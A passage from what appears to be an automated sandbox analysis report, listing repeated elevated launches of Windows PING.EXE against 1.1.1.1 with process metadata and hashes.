MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:17:47:27
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:17:47:31
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:17:47:34
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:17:47:38
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:17:47:41
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:17:47:45
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:17:47:48
Start date:23/04/2024
Path:C:\Windows\System32\PING.EXE
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
Imagebase:0x7ff7b8720000
File size:22'528 bytes
MD5 hash:2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

No disassembly